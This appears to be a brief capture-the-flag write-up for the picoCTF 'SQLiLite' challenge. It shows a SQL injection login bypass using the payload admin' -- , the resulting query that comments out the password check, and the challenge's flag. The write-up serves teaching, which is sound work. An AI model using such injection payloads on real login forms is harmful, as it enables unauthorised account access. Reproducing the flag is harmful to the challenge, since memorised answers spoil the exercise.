SQLiLite

Challenge

Can you login to this website?

Solution

This is a basic SQL injection. Using the payload admin' -- (because the hint says to sign in as the admin user) and anything for the password logs in. After logging in, this is shown:
username: admin' --
password: asd
SQL query: SELECT * FROM users WHERE name='admin' --' AND password='asd'
Logged in! But can you see the flag, it is in plainsight.
The flag is in the source code.

Flag

picoCTF{L00k5_l1k3_y0u_solv3d_it_9b0a4e21}
Copy link
Edit on GitHub